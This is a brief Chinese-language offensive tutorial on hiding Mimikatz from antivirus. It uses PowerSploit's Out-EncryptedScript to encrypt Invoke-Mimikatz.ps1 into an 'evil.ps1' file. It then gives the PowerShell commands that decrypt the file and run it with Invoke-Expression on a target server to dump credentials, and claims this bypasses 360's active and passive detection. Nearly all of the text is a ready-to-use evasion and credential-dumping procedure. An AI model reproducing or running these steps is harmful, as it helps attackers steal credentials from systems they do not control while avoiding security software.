minikatz免杀之Out-EncryptedScript加密
Out-EncryptedScript加密
准备工作:PowerSploit下载
https://github.com/PowerShellMafia/PowerSploit
步骤
思路:利用Out-EncryptedScript.ps1把Invoke-Mimikatz.ps1进行加密
把Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放在一起
Out-EncryptedScript.ps1在ScriptModification目录下
Invoke-Mimikatz.ps1在Exfiltration目录下
进行加密
导入Out-EncryptedScript.ps1
Import-Module .\Out-EncryptedScript.ps1
进行加密
Out-EncryptedScript .\Invoke-Mimikatz.ps1 -Password 123 -Salt 123456
会在当前目录下生成evil.ps1文件,Password为密码 ,Salt为密钥
读取密码
把生成的evil.ps1放到目标服务器上,执行脚本:
[String] $cmd = Get-Content .\evil.ps1
Invoke-Expression $cmd
$decrypted = de password salt
Invoke-Expression $decrypted
Invoke-Mimikatz
过360主动被动